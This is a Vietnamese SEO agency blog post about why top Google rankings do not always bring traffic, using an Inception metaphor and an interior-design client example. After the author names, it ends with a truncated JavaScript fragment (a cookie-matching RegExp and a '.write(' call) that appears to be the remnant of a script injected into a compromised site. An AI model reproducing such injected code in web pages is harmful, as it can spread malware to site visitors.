Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > SEOCEPTION – Định hướng người dùng

SEOCEPTION – Định hướng người dùng

Từ tên bài viết, chắc bạn cũng đang liên tưởng đến bộ phim Inception của Christopher Nolan. Trong bộ phim nhân vật chính là kẻ cấy 1 ý tưởng vào trí não của một người khác mà người đó không hề hay biết và hiểu lầm rằng đó là ý tưởng của chính họ. Hiểu một cách trìu tượng, công việc SEO của chúng ta cũng giống với công việc mà nhân vật Cobb làm trong bộ phim. Chúng ta cấy “ý tưởng”, tạo sử khởi nguồn (Inception) để google nghĩ rằng website của chúng ta là tốt nhất và đưa nó lên đầu. Và khi Website của chúng ta lên đầu, thì sản phẩm, dịch vụ điều bạn muốn nói sẽ đến được với nhiều người dùng hơn.

Vấn đề chính mà tôi muốn chia sẻ với bạn trong bài viết này, là việc liệu ý tưởng chúng ta cấy lên Google có thực sự đem lại hiệu quả không, yếu tố nào đánh giá hiệu quả của việc từ khóa lên top 10 đối với khách hàng thuê dịch vụ của chúng ta?

I. Số lượt search nhiều chưa chắc đã hiệu quả.

Tôi sẽ ví dụ một dự án mà tôi đã từng thực hiện. Đó là ngành thiết kế nội thất. Quá trình đánh giá từ khóa khá chuẩn, cả về độ khó và lượt tìm kiếm.

thiet ke noi that

Sau khi website của khách hàng lên vị trí top 3. Tôi đã chốt hợp đồng và hoàn thành dự án với khách hàng. Nhưng một vấn đề nảy sinh là lượt truy cập báo về từ Webmaster Tools với cả 2 từ khóa “thiết kế nội thất” và “thiet ke noi that” chỉ đếm trên đầu ngón tay, 5 đến 6 lượt 1 ngày, khá khẩm hơn cũng chỉ dừng lại ở mức 40 đến 50 lượt.

Rõ ràng còn có các yếu tố khác tác động lên lượt tìm kiếm và tuy cập của từ khóa này đó là tình hình kinh tế xã hội, xu hướng người dùng và ngay cả chính nội dung của website.

II. Sự khác biệt với đối thủ.

Chúng ta làm seo cho khách hàng kinh doanh một sản phẩm và dịch vụ nào đó. Và trong ngành của khách hàng cũng có muôn vàn đối thủ trong lĩnh vực này. Sẽ có những đối thủ mạnh và đối thủ yếu. Đối thủ yếu chúng ta vượt qua dễ dàng, đối thủ mạnh chúng ta có thể vượt qua, nhưng nếu đối thủ là kẻ cực mạnh thì sao. Họ sở hữu website tốt, luôn ở top 1, dịch vụ và hàng hóa họ kinh doanh cũng tốt nốt thì sao?.

Việc SEO cho khách hàng có những đối thủ cực mạnh như vậy thường có giá trị hợp đồng cao, nhưng sau quá trình SEO đạt vị trí nào đó trong top 5 hoặc 10 nhưng lượng khách truy cập vẫn thấp và không xứng tầm, thì chính chúng ta phải đánh giá lại dịch vụ và hàng hóa mà khách hàng của chúng ta cung cấp cho người dùng. Ví đó mới là thứ người dùng thật sự cần. Sự đánh giá đó cũng giúp chúng ta tư vấn một cách chính xác hơn cho khách hàng nhằm đem lại thứ tốt nhất cho người dùng. Từ đó đạt được thằng lợi 4 bên: bạn, khách hàng của bạn, người dùng, và google.

Việc SEO dễ và khó phụ thuộc vào rất nhiều điều kiện, biến số, thuật toán của google nhưng trên hơn hết vẫn là thứ chúng ta có thể đem lại cho người dùng, người tìm kiếm. Điều đó mới giúp Website lên top ổn định và có lượng truy cập tốt.

Pridio

Tk_Nam

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘